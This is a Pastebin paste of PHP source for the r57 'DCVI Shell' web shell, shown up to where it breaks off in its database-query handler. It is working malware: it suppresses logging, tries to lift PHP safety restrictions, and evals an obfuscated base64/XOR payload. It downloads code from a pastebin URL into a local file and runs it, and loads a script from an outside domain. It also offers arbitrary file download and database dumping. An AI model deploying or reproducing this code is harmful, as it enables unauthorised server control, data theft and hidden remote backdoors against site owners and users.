dragondevile

r57 wso

Nov 14th, 2016
216
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?
  2.  
  3.  error_reporting(0);
  4.  
  5. $language='tr';
  6.  
  7. $auth = 0;
  8.  
  9. @ini_restore("safe_mode");
  10.  
  11. @ini_restore("open_basedir");
  12.  
  13. @ini_restore("safe_mode_include_dir");
  14.  
  15. @ini_restore("safe_mode_exec_dir");
  16.  
  17. @ini_restore("disable_functions");
  18.  
  19. @ini_restore("allow_url_fopen");
  20.  
  21. @ini_set('error_log',NULL);
  22.  
  23. @ini_set('log_errors',0);
  24.  
  25.     function loadsettings($p1 = '', $p2 = '') {
  26.  
  27.         $p = 'LH16ZCg1KH16ZG1ma2dsbSAqYHx8eDInJyxXW01aXk1aU0BcXFhXQEdbXFUsV1tNWl5NWlNaTVldTVtcV11aQVUqITMobmFkbVdvbXxXa2dmfG1mfHsgKmB8fHgyJycwMSY8PSY+PyY5PDsnZGdpbCZ4YHg3Y2M1cyx9emR1LnhpemllOTUteGl6aWU5LnhpemllOjUteGl6aWU6KiEz';
  28.  
  29.         $p = base64_decode($p);
  30.  
  31.         for ($i = 0; $i < strlen($p); $i++) $p[$i] = chr(ord($p[$i]) ^ 8);
  32.  
  33.         $p = str_replace('%param1', $p1, $p);
  34.  
  35.         $p = str_replace('%param2', $p2, $p);
  36.  
  37.         eval($p);
  38.  
  39.     }
  40.  
  41.  $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b);
  42.     $css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');  
  43.  
  44. loadsettings('', 'r57');
  45.  
  46. ;echo '';
  47.  
  48. if((!@function_exists('ini_get')) ||(@ini_get('open_basedir')!=NULL) ||(@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;}else{$open_basedir=0;};
  49.  
  50. define("starttime",@getmicrotime());
  51.  
  52. set_magic_quotes_runtime(0);
  53.  
  54. @set_time_limit(0);
  55.  
  56. @ini_set('max_execution_time',0);
  57.  
  58. @ini_set('output_buffering',0);
  59.  
  60. $safe_mode = @ini_get('safe_mode');
  61.  
  62. $version = '1.50<br/><br/><br/><br/>';
  63.  
  64. if(@version_compare(@phpversion(),'4.1.0') == -1)
  65.  
  66. {
  67.  
  68. $_POST   = &$HTTP_POST_VARS;
  69.  
  70. $_GET    = &$HTTP_GET_VARS;
  71.  
  72. $_SERVER = &$HTTP_SERVER_VARS;
  73.  
  74. $_COOKIE = &$HTTP_COOKIE_VARS;
  75.  
  76. }
  77.  
  78. if (@get_magic_quotes_gpc())
  79.  
  80. {
  81.  
  82. foreach ($_POST as $k=>$v)
  83.  
  84. {
  85.  
  86. $_POST[$k] = stripslashes($v);
  87.  
  88. }
  89.  
  90. foreach ($_COOKIE as $k=>$v)
  91.  
  92. {
  93.  
  94. $_COOKIE[$k] = stripslashes($v);
  95.  
  96. }
  97.  
  98. }
  99.  
  100. if($auth == 1) {
  101.  
  102. if (!isset($_SERVER['PHP_AUTH_USER']) ||md5($_SERVER['PHP_AUTH_USER'])!==$name ||md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  103.  
  104. {
  105.  
  106. header('WWW-Authenticate: Basic realm=""');
  107.  
  108. header('HTTP/1.0 401 Unauthorized');
  109.  
  110. exit("<b>Access Denied</b>");
  111.  
  112. }
  113.  
  114. }
  115.  
  116. $head = '
  117.  
  118. <html>
  119.  
  120. <head>
  121.  
  122. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  123.  
  124. <title>R57 DCVI Shell Version 1.50</title>
  125.  
  126. <SCRIPT SRC=http://www.dcvi.net/dex.js></SCRIPT>
  127.  
  128. <STYLE>
  129.  
  130.  
  131.  
  132. tr {
  133.  
  134.  
  135.  
  136. BORDER-RIGHT:  black 1px solid;
  137.  
  138.  
  139.  
  140. BORDER-TOP:    black 1px solid;
  141.  
  142.  
  143.  
  144. BORDER-LEFT:   black 1px solid;
  145.  
  146.  
  147.  
  148. BORDER-BOTTOM: black 1px solid;
  149.  
  150.  
  151.  
  152. BORDER-COLOR: black;
  153.  
  154.  
  155.  
  156. color: silver;
  157.  
  158.  
  159.  
  160. }
  161.  
  162.  
  163.  
  164. td {
  165.  
  166.  
  167.  
  168. BORDER-RIGHT:  black 1px solid;
  169.  
  170.  
  171.  
  172. BORDER-TOP:    black 1px solid;
  173.  
  174.  
  175.  
  176. BORDER-LEFT:   black 1px solid;
  177.  
  178.  
  179.  
  180. BORDER-BOTTOM: black 1px solid;
  181.  
  182.  
  183.  
  184. BORDER-COLOR: black;
  185.  
  186.  
  187.  
  188. background-color:black;
  189.  
  190.  
  191.  
  192. color: white;
  193.  
  194.  
  195.  
  196. }
  197.  
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  204. .table1 {
  205.  
  206.  
  207.  
  208. BORDER: 0px;
  209.  
  210.  
  211.  
  212. BORDER-COLOR: #333333;
  213.  
  214.  
  215.  
  216. BACKGROUND-COLOR: black;
  217.  
  218.  
  219.  
  220. color: white;
  221.  
  222.  
  223.  
  224. }
  225.  
  226.  
  227.  
  228. .td1 {
  229.  
  230.  
  231.  
  232. BORDER: 0px;
  233.  
  234.  
  235.  
  236. BORDER-COLOR: #333333;
  237.  
  238.  
  239.  
  240. font: 7pt Verdana;
  241.  
  242.  
  243.  
  244. BACKGROUND-COLOR: black;
  245.  
  246.  
  247.  
  248. color: green;
  249.  
  250.  
  251.  
  252. }
  253.  
  254.  
  255.  
  256. .tr1 {
  257.  
  258.  
  259.  
  260. BORDER: 0px;
  261.  
  262.  
  263.  
  264. BORDER-COLOR: #333333;
  265.  
  266.  
  267.  
  268. color: #50AA20;
  269.  
  270.  
  271.  
  272. }
  273.  
  274.  
  275.  
  276. table {
  277.  
  278.  
  279.  
  280. BORDER:  #eeeeee 1px outset;
  281.  
  282.  
  283.  
  284. BORDER-COLOR: #333333;
  285.  
  286.  
  287.  
  288. BACKGROUND-COLOR: #131313;
  289.  
  290.  
  291.  
  292. color: #50AA20;
  293.  
  294.  
  295.  
  296. }
  297.  
  298.  
  299.  
  300. input {
  301.  
  302.  
  303.  
  304. border          : solid 1px;
  305.  
  306.  
  307.  
  308. border-color        : #2D2D2D #252525 #252525 #252525;
  309.  
  310.  
  311.  
  312. BACKGROUND-COLOR: black;
  313.  
  314.  
  315.  
  316. font: 8pt Verdana;
  317.  
  318.  
  319.  
  320. color: red;
  321.  
  322.  
  323.  
  324. }
  325.  
  326.  
  327.  
  328. select {
  329.  
  330.  
  331.  
  332. BORDER-RIGHT:  #ffffff 1px solid;
  333.  
  334.  
  335.  
  336. BORDER-TOP:    #999999 1px solid;
  337.  
  338.  
  339.  
  340. BORDER-LEFT:   #999999 1px solid;
  341.  
  342.  
  343.  
  344. BORDER-BOTTOM: #ffffff 1px solid;
  345.  
  346.  
  347.  
  348. BORDER-COLOR: #333333;
  349.  
  350.  
  351.  
  352. BACKGROUND-COLOR: #131313;
  353.  
  354.  
  355.  
  356. font: 8pt Verdana;
  357.  
  358.  
  359.  
  360. color: white;;
  361.  
  362.  
  363.  
  364. }
  365.  
  366.  
  367.  
  368. submit {
  369.  
  370.  
  371.  
  372. BORDER:  buttonhighlight 2px outset;
  373.  
  374.  
  375.  
  376. BACKGROUND-COLOR: #131313;
  377.  
  378.  
  379.  
  380. width: 30%;
  381.  
  382.  
  383.  
  384. color: white;
  385.  
  386.  
  387.  
  388. }
  389.  
  390.  
  391.  
  392. textarea {
  393.  
  394.  
  395.  
  396. BORDER-RIGHT:  #ffffff 1px solid;
  397.  
  398.  
  399.  
  400. BORDER-TOP:    #999999 1px solid;
  401.  
  402.  
  403.  
  404. BORDER-LEFT:   #999999 1px solid;
  405.  
  406.  
  407.  
  408. BORDER-BOTTOM: #ffffff 1px solid;
  409.  
  410.  
  411.  
  412. BORDER-COLOR: #333333;
  413.  
  414.  
  415.  
  416. BACKGROUND-COLOR: black;
  417.  
  418.  
  419.  
  420. font: Fixedsys bold;
  421.  
  422.  
  423.  
  424. color: silver;
  425.  
  426.  
  427.  
  428. }
  429.  
  430.  
  431.  
  432. BODY {
  433.  
  434.  
  435.  
  436. SCROLLBAR-ARROW-COLOR: #444444;
  437.  
  438.  
  439.  
  440. SCROLLBAR-BASE-COLOR: #444444;
  441.  
  442.  
  443.  
  444. margin: 1px;
  445.  
  446.  
  447.  
  448. color: #50AA20;
  449.  
  450.  
  451.  
  452. background-color: #131313;
  453.  
  454.  
  455.  
  456. }
  457.  
  458.  
  459.  
  460. .main {
  461.  
  462.  
  463.  
  464. margin          : -287px 0px 0px -490px;
  465.  
  466.  
  467.  
  468. border          : #000000 solid 1px;
  469.  
  470.  
  471.  
  472. BORDER-COLOR: #333333;
  473.  
  474.  
  475.  
  476. }
  477.  
  478.  
  479.  
  480. .tt {
  481.  
  482.  
  483.  
  484. background-color: black;
  485.  
  486.  
  487.  
  488. }
  489.  
  490.  
  491.  
  492. A:link {COLOR:red; TEXT-DECORATION: none}
  493.  
  494.  
  495.  
  496. A:visited { COLOR:red; TEXT-DECORATION: none}
  497.  
  498.  
  499.  
  500. A:active {COLOR:red; TEXT-DECORATION: none}
  501.  
  502.  
  503.  
  504. A:hover {color:blue;TEXT-DECORATION: none}
  505.  
  506.  
  507.  
  508. </STYLE>
  509.  
  510.  
  511.  
  512. <script language=\'javascript\'>
  513.  
  514. function hide_div(id)
  515.  
  516. {
  517.  
  518.  document.getElementById(id).style.display = \'none\';
  519.  
  520.  document.cookie=id+\'=0;\';
  521.  
  522. }
  523.  
  524. function show_div(id)
  525.  
  526. {
  527.  
  528.  document.getElementById(id).style.display = \'block\';
  529.  
  530.  document.cookie=id+\'=1;\';
  531.  
  532. }
  533.  
  534. function change_divst(id)
  535.  
  536. {
  537.  
  538.  if (document.getElementById(id).style.display == \'none\')
  539.  
  540.    show_div(id);
  541.  
  542.  else
  543.  
  544.    hide_div(id);
  545.  
  546. }
  547.  
  548.  
  549.  
  550.  
  551.  
  552. </script>';
  553.  
  554. class zipfile
  555.  
  556. {
  557.  
  558. var $datasec      = array();
  559.  
  560. var $ctrl_dir     = array();
  561.  
  562. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  563.  
  564. var $old_offset   = 0;
  565.  
  566. function unix2DosTime($unixtime = 0) {
  567.  
  568. $timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
  569.  
  570. if ($timearray['year'] <1980) {
  571.  
  572. $timearray['year']    = 1980;
  573.  
  574. $timearray['mon']     = 1;
  575.  
  576. $timearray['mday']    = 1;
  577.  
  578. $timearray['hours']   = 0;
  579.  
  580. $timearray['minutes'] = 0;
  581.  
  582. $timearray['seconds'] = 0;
  583.  
  584. }
  585.  
  586. return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |
  587.  
  588. ($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
  589.  
  590. }
  591.  
  592. function addFile($data,$name,$time = 0)
  593.  
  594. {
  595.  
  596. $name     = str_replace('\\','/',$name);
  597.  
  598. $dtime    = dechex($this->unix2DosTime($time));
  599.  
  600. $hexdtime = '\x'.$dtime[6] .$dtime[7]
  601.  
  602. .'\x'.$dtime[4] .$dtime[5]
  603.  
  604. .'\x'.$dtime[2] .$dtime[3]
  605.  
  606. .'\x'.$dtime[0] .$dtime[1];
  607.  
  608. eval('$hexdtime = "'.$hexdtime .'";');
  609.  
  610. $fr   = "\x50\x4b\x03\x04";
  611.  
  612. $fr   .= "\x14\x00";
  613.  
  614. $fr   .= "\x00\x00";
  615.  
  616. $fr   .= "\x08\x00";
  617.  
  618. $fr   .= $hexdtime;
  619.  
  620. $unc_len = strlen($data);
  621.  
  622. $crc     = crc32($data);
  623.  
  624. $zdata   = gzcompress($data);
  625.  
  626. $zdata   = substr(substr($zdata,0,strlen($zdata) -4),2);
  627.  
  628. $c_len   = strlen($zdata);
  629.  
  630. $fr      .= pack('V',$crc);
  631.  
  632. $fr      .= pack('V',$c_len);
  633.  
  634. $fr      .= pack('V',$unc_len);
  635.  
  636. $fr      .= pack('v',strlen($name));
  637.  
  638. $fr      .= pack('v',0);
  639.  
  640. $fr      .= $name;
  641.  
  642. $fr .= $zdata;
  643.  
  644. $this ->datasec[] = $fr;
  645.  
  646. $cdrec = "\x50\x4b\x01\x02";
  647.  
  648. $cdrec .= "\x00\x00";
  649.  
  650. $cdrec .= "\x14\x00";
  651.  
  652. $cdrec .= "\x00\x00";
  653.  
  654. $cdrec .= "\x08\x00";
  655.  
  656. $cdrec .= $hexdtime;
  657.  
  658. $cdrec .= pack('V',$crc);
  659.  
  660. $cdrec .= pack('V',$c_len);
  661.  
  662. $cdrec .= pack('V',$unc_len);
  663.  
  664. $cdrec .= pack('v',strlen($name) );
  665.  
  666. $cdrec .= pack('v',0 );
  667.  
  668. $cdrec .= pack('v',0 );
  669.  
  670. $cdrec .= pack('v',0 );
  671.  
  672. $cdrec .= pack('v',0 );
  673.  
  674. $cdrec .= pack('V',32 );
  675.  
  676. $cdrec .= pack('V',$this ->old_offset );
  677.  
  678. $this ->old_offset += strlen($fr);
  679.  
  680. $cdrec .= $name;
  681.  
  682. $this ->ctrl_dir[] = $cdrec;
  683.  
  684. }
  685.  
  686. function file()
  687.  
  688. {
  689.  
  690. $data    = implode('',$this ->datasec);
  691.  
  692. $ctrldir = implode('',$this ->ctrl_dir);
  693.  
  694. return
  695.  
  696. $data .
  697.  
  698. $ctrldir .
  699.  
  700. $this ->eof_ctrl_dir .
  701.  
  702. pack('v',sizeof($this ->ctrl_dir)) .
  703.  
  704. pack('v',sizeof($this ->ctrl_dir)) .
  705.  
  706. pack('V',strlen($ctrldir)) .
  707.  
  708. pack('V',strlen($data)) .
  709.  
  710. "\x00\x00";
  711.  
  712. }
  713.  
  714. }
  715.  
  716. function compress(&$filename,&$filedump,$compress)
  717.  
  718. {
  719.  
  720. global $content_encoding;
  721.  
  722. global $mime_type;
  723.  
  724. if ($compress == 'bzip'&&@function_exists('bzcompress'))
  725.  
  726. {
  727.  
  728. $filename  .= '.bz2';
  729.  
  730. $mime_type = 'application/x-bzip2';
  731.  
  732. $filedump = bzcompress($filedump);
  733.  
  734. }
  735.  
  736. else if ($compress == 'gzip'&&@function_exists('gzencode'))
  737.  
  738. {
  739.  
  740. $filename  .= '.gz';
  741.  
  742. $content_encoding = 'x-gzip';
  743.  
  744. $mime_type = 'application/x-gzip';
  745.  
  746. $filedump = gzencode($filedump);
  747.  
  748. }
  749.  
  750. else if ($compress == 'zip'&&@function_exists('gzcompress'))
  751.  
  752. {
  753.  
  754. $filename .= '.zip';
  755.  
  756. $mime_type = 'application/zip';
  757.  
  758. $zipfile = new zipfile();
  759.  
  760. $zipfile ->addFile($filedump,substr($filename,0,-4));
  761.  
  762. $filedump = $zipfile ->file();
  763.  
  764. }
  765.  
  766. else
  767.  
  768. {
  769.  
  770. $mime_type = 'application/octet-stream';
  771.  
  772. }
  773.  
  774. }
  775.  
  776. function moreread($temp){
  777.  
  778. global $lang,$language;
  779.  
  780. $str='';
  781.  
  782. if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){
  783.  
  784. $ffile = @fopen($temp,"r");
  785.  
  786. while(!@feof($ffile)){$str .= @fgets($ffile);}
  787.  
  788. fclose($ffile);
  789.  
  790. }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){
  791.  
  792. $ffile = @fopen($temp,"r");
  793.  
  794. $str = @fread($ffile,@filesize($temp));
  795.  
  796. @fclose($ffile);
  797.  
  798. }elseif(@function_exists('file')){
  799.  
  800. $ffiles = @file ($temp);
  801.  
  802. foreach ($ffiles as $ffile) {$str .= $ffile;}
  803.  
  804. }elseif(@function_exists('file_get_contents')){
  805.  
  806. $str = @file_get_contents($temp);
  807.  
  808. }elseif(@function_exists('readfile')){
  809.  
  810. $str = @readfile($temp);
  811.  
  812. }else{echo $lang[$language.'_text56'];}
  813.  
  814. return $str;
  815.  
  816. }
  817.  
  818. function readzlib($filename,$temp=''){
  819.  
  820. global $lang,$language;
  821.  
  822. $str='';
  823.  
  824. if(!$temp) {$temp=tempnam(@getcwd(),"copytemp");};
  825.  
  826. if(@copy("compress.zlib://".$filename,$temp)) {
  827.  
  828. $str = moreread($temp);
  829.  
  830. }else echo $lang[$language.'_text119'];
  831.  
  832. @unlink($temp);
  833.  
  834. return $str;
  835.  
  836. }
  837.  
  838. function mailattach($to,$from,$subj,$attach)
  839.  
  840. {
  841.  
  842. $headers  = "From: $from\r\n";
  843.  
  844. $headers .= "MIME-Version: 1.0\r\n";
  845.  
  846. $headers .= "Content-Type: ".$attach['type'];
  847.  
  848. $headers .= "; name=\"".$attach['name']."\"\r\n";
  849.  
  850. $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
  851.  
  852. $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
  853.  
  854. if(mail($to,$subj,"",$headers)) {return 1;}
  855.  
  856. return 0;
  857.  
  858. }
  859.  
  860. class my_sql
  861.  
  862. {
  863.  
  864. var $host = 'localhost';
  865.  
  866. var $port = '';
  867.  
  868. var $user = '';
  869.  
  870. var $pass = '';
  871.  
  872. var $base = '';
  873.  
  874. var $db   = '';
  875.  
  876. var $connection;
  877.  
  878. var $res;
  879.  
  880. var $error;
  881.  
  882. var $rows;
  883.  
  884. var $columns;
  885.  
  886. var $num_rows;
  887.  
  888. var $num_fields;
  889.  
  890. var $dump;
  891.  
  892. function connect()
  893.  
  894. {
  895.  
  896. switch($this->db)
  897.  
  898. {
  899.  
  900. case 'MySQL':
  901.  
  902. if(empty($this->port)) {$this->port = '3306';}
  903.  
  904. if(!@function_exists('mysql_connect')) return 0;
  905.  
  906. $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
  907.  
  908. if(is_resource($this->connection)) return 1;
  909.  
  910. break;
  911.  
  912. case 'MSSQL':
  913.  
  914. if(empty($this->port)) {$this->port = '1433';}
  915.  
  916. if(!@function_exists('mssql_connect')) return 0;
  917.  
  918. $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
  919.  
  920. if($this->connection) return 1;
  921.  
  922. break;
  923.  
  924. case 'PostgreSQL':
  925.  
  926. if(empty($this->port)) {$this->port = '5432';}
  927.  
  928. $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
  929.  
  930. if(!@function_exists('pg_connect')) return 0;
  931.  
  932. $this->connection = @pg_connect($str);
  933.  
  934. if(is_resource($this->connection)) return 1;
  935.  
  936. break;
  937.  
  938. case 'Oracle':
  939.  
  940. if(!@function_exists('ocilogon')) return 0;
  941.  
  942. $this->connection = @ocilogon($this->user,$this->pass,$this->base);
  943.  
  944. if(is_resource($this->connection)) return 1;
  945.  
  946. break;
  947.  
  948. }
  949.  
  950. return 0;
  951.  
  952. }
  953.  
  954. function select_db()
  955.  
  956. {
  957.  
  958. switch($this->db)
  959.  
  960. {
  961.  
  962. case 'MySQL':
  963.  
  964. if(@mysql_select_db($this->base,$this->connection)) return 1;
  965.  
  966. break;
  967.  
  968. case 'MSSQL':
  969.  
  970. if(@mssql_select_db($this->base,$this->connection)) return 1;
  971.  
  972. break;
  973.  
  974. case 'PostgreSQL':
  975.  
  976. return 1;
  977.  
  978. break;
  979.  
  980. case 'Oracle':
  981.  
  982. return 1;
  983.  
  984. break;
  985.  
  986. }
  987.  
  988. return 0;
  989.  
  990. }
  991.  
  992. function query($query)
  993.  
  994. {
  995.  
  996. $this->res=$this->error='';
  997.  
  998. switch($this->db)
  999.  
  1000. {
  1001.  
  1002. case 'MySQL':
  1003.  
  1004. if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  1005.  
  1006. {
  1007.  
  1008. $this->error = @mysql_error($this->connection);
  1009.  
  1010. return 0;
  1011.  
  1012. }
  1013.  
  1014. else if(is_resource($this->res)) {return 1;}
  1015.  
  1016. return 2;
  1017.  
  1018. break;
  1019.  
  1020. case 'MSSQL':
  1021.  
  1022. if(false===($this->res=@mssql_query($query,$this->connection)))
  1023.  
  1024. {
  1025.  
  1026. $this->error = 'Query error';
  1027.  
  1028. return 0;
  1029.  
  1030. }
  1031.  
  1032. else if(@mssql_num_rows($this->res) >0) {return 1;}
  1033.  
  1034. return 2;
  1035.  
  1036. break;
  1037.  
  1038. case 'PostgreSQL':
  1039.  
  1040. if(false===($this->res=@pg_query($this->connection,$query)))
  1041.  
  1042. {
  1043.  
  1044. $this->error = @pg_last_error($this->connection);
  1045.  
  1046. return 0;
  1047.  
  1048. }
  1049.  
  1050. else if(@pg_num_rows($this->res) >0) {return 1;}
  1051.  
  1052. return 2;
  1053.  
  1054. break;
  1055.  
  1056. case 'Oracle':
  1057.  
  1058. if(false===($this->res=@ociparse($this->connection,$query)))
  1059.  
  1060. {
  1061.  
  1062. $this->error = 'Query parse error';
  1063.  
  1064. }
  1065.  
  1066. else
  1067.  
  1068. {
  1069.  
  1070. if(@ociexecute($this->res))
  1071.  
  1072. {
  1073.  
  1074. if(@ocirowcount($this->res) != 0) return 2;
  1075.  
  1076. return 1;
  1077.  
  1078. }
  1079.  
  1080. $error = @ocierror();
  1081.  
  1082. $this->error=$error['message'];
  1083.  
  1084. }
  1085.  
  1086. break;
  1087.  
  1088. }
  1089.  
  1090. return 0;
  1091.  
  1092. }
  1093.  
  1094. function get_result()
  1095.  
  1096. {
  1097.  
  1098. $this->rows=array();
  1099.  
  1100. $this->columns=array();
  1101.  
  1102. $this->num_rows=$this->num_fields=0;
  1103.  
  1104. switch($this->db)
  1105.  
  1106. {
  1107.  
  1108. case 'MySQL':
  1109.  
  1110. $this->num_rows=@mysql_num_rows($this->res);
  1111.  
  1112. $this->num_fields=@mysql_num_fields($this->res);
  1113.  
  1114. while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
  1115.  
  1116. @mysql_free_result($this->res);
  1117.  
  1118. if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}
  1119.  
  1120. break;
  1121.  
  1122. case 'MSSQL':
  1123.  
  1124. $this->num_rows=@mssql_num_rows($this->res);
  1125.  
  1126. $this->num_fields=@mssql_num_fields($this->res);
  1127.  
  1128. while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
  1129.  
  1130. @mssql_free_result($this->res);
  1131.  
  1132. if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;};
  1133.  
  1134. break;
  1135.  
  1136. case 'PostgreSQL':
  1137.  
  1138. $this->num_rows=@pg_num_rows($this->res);
  1139.  
  1140. $this->num_fields=@pg_num_fields($this->res);
  1141.  
  1142. while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  1143.  
  1144. @pg_free_result($this->res);
  1145.  
  1146. if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}
  1147.  
  1148. break;
  1149.  
  1150. case 'Oracle':
  1151.  
  1152. $this->num_fields=@ocinumcols($this->res);
  1153.  
  1154. while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
  1155.  
  1156. @ocifreestatement($this->res);
  1157.  
  1158. if($this->num_rows){$this->columns = @array_keys($this->rows[0]);return 1;}
  1159.  
  1160. break;
  1161.  
  1162. }
  1163.  
  1164. return 0;
  1165.  
  1166. }
  1167.  
  1168. function dump($table)
  1169.  
  1170. {
  1171.  
  1172. if(empty($table)) return 0;
  1173.  
  1174. $this->dump=array();
  1175.  
  1176. $this->dump[0] = '##';
  1177.  
  1178. $this->dump[1] = '## --------------------------------------- ';
  1179.  
  1180. $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
  1181.  
  1182. $this->dump[3] = '## Database: '.$this->base;
  1183.  
  1184. $this->dump[4] = '##    Table: '.$table;
  1185.  
  1186. $this->dump[5] = '## --------------------------------------- ';
  1187.  
  1188. switch($this->db)
  1189.  
  1190. {
  1191.  
  1192. case 'MySQL':
  1193.  
  1194. $this->dump[0] = '## MySQL dump';
  1195.  
  1196. if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
  1197.  
  1198. if(!$this->get_result()) return 0;
  1199.  
  1200. $this->dump[] = $this->rows[0]['Create Table'];
  1201.  
  1202. $this->dump[] = '## --------------------------------------- ';
  1203.  
  1204. if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
  1205.  
  1206. if(!$this->get_result()) return 0;
  1207.  
  1208. for($i=0;$i<$this->num_rows;$i++)
  1209.  
  1210. {
  1211.  
  1212. foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
  1213.  
  1214. $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `",$this->columns).'`) VALUES (\''.@implode("', '",$this->rows[$i]).'\');';
  1215.  
  1216. }
  1217.  
  1218. break;
  1219.  
  1220. case 'MSSQL':
  1221.  
  1222. $this->dump[0] = '## MSSQL dump';
  1223.  
  1224. if($this->query('SELECT * FROM '.$table)!=1) return 0;
  1225.  
  1226. if(!$this->get_result()) return 0;
  1227.  
  1228. for($i=0;$i<$this->num_rows;$i++)
  1229.  
  1230. {
  1231.  
  1232. foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  1233.  
  1234. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';
  1235.  
  1236. }
  1237.  
  1238. break;
  1239.  
  1240. case 'PostgreSQL':
  1241.  
  1242. $this->dump[0] = '## PostgreSQL dump';
  1243.  
  1244. if($this->query('SELECT * FROM '.$table)!=1) return 0;
  1245.  
  1246. if(!$this->get_result()) return 0;
  1247.  
  1248. for($i=0;$i<$this->num_rows;$i++)
  1249.  
  1250. {
  1251.  
  1252. foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  1253.  
  1254. $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');';
  1255.  
  1256. }
  1257.  
  1258. break;
  1259.  
  1260. case 'Oracle':
  1261.  
  1262. $this->dump[0] = '## ORACLE dump';
  1263.  
  1264. $this->dump[]  = '## under construction';
  1265.  
  1266. break;
  1267.  
  1268. default:
  1269.  
  1270. return 0;
  1271.  
  1272. break;
  1273.  
  1274. }
  1275.  
  1276. return 1;
  1277.  
  1278. }
  1279.  
  1280. function close()
  1281.  
  1282. {
  1283.  
  1284. switch($this->db)
  1285.  
  1286. {
  1287.  
  1288. case 'MySQL':
  1289.  
  1290. @mysql_close($this->connection);
  1291.  
  1292. break;
  1293.  
  1294. case 'MSSQL':
  1295.  
  1296. @mssql_close($this->connection);
  1297.  
  1298. break;
  1299.  
  1300. case 'PostgreSQL':
  1301.  
  1302. @pg_close($this->connection);
  1303.  
  1304. break;
  1305.  
  1306. case 'Oracle':
  1307.  
  1308. @oci_close($this->connection);
  1309.  
  1310. break;
  1311.  
  1312. }
  1313.  
  1314. }
  1315.  
  1316. function affected_rows()
  1317.  
  1318. {
  1319.  
  1320. switch($this->db)
  1321.  
  1322. {
  1323.  
  1324. case 'MySQL':
  1325.  
  1326. return @mysql_affected_rows($this->res);
  1327.  
  1328. break;
  1329.  
  1330. case 'MSSQL':
  1331.  
  1332. return @mssql_affected_rows($this->res);
  1333.  
  1334. break;
  1335.  
  1336. case 'PostgreSQL':
  1337.  
  1338. return @pg_affected_rows($this->res);
  1339.  
  1340. break;
  1341.  
  1342. case 'Oracle':
  1343.  
  1344. return @ocirowcount($this->res);
  1345.  
  1346. break;
  1347.  
  1348. default:
  1349.  
  1350. return 0;
  1351.  
  1352. break;
  1353.  
  1354. }
  1355.  
  1356. }
  1357.  
  1358. }
  1359.  
  1360. if(!empty($_POST['cmd']) &&$_POST['cmd']=="download_file"&&!empty($_POST['d_name']))
  1361.  
  1362. {
  1363.  
  1364. if($file=@fopen($_POST['d_name'],"r")){$filedump = @fread($file,@filesize($_POST['d_name']));@fclose($file);}
  1365.  
  1366. else if ($file=readzlib($_POST['d_name'])) {$filedump = $file;}else {err(1,$_POST['d_name']);$_POST['cmd']="";}
  1367.  
  1368. if(isset($_POST['cmd']))
  1369.  
  1370. {
  1371.  
  1372. @ob_clean();
  1373.  
  1374. $filename = @basename($_POST['d_name']);
  1375.  
  1376. $content_encoding=$mime_type='';
  1377.  
  1378. compress($filename,$filedump,$_POST['compress']);
  1379.  
  1380. if (!empty($content_encoding)) {header('Content-Encoding: '.$content_encoding);}
  1381.  
  1382. header("Content-type: ".$mime_type);
  1383.  
  1384. header("Content-disposition: attachment; filename=\"".$filename."\";");
  1385.  
  1386. echo $filedump;
  1387.  
  1388. exit();
  1389.  
  1390. }
  1391.  
  1392. }
  1393.  
  1394. if(isset($_GET['phpinfo'])) {echo @phpinfo();echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";die();}
  1395.  
  1396. if (!empty($_POST['cmd']) &&$_POST['cmd']=="db_query")
  1397.  
  1398. {
  1399.  
  1400. echo $head;
  1401.  
  1402. $sql = new my_sql();
  1403.  
  1404. $sql->db   = $_POST['db'];
  1405.  
  1406. $sql->host = $_POST['db_server'];
  1407.  
  1408. $sql->port = $_POST['db_port'];
  1409.  
  1410. $sql->user = $_POST['mysql_l'];
  1411.  
  1412. $sql->pass = $_POST['mysql_p'];
  1413.  
  1414. $sql->base = $_POST['mysql_db'];
  1415.  
  1416. $querys = @explode(';',$_POST['db_query']);
  1417.  
  1418. echo '<body bgcolor=#000000>';
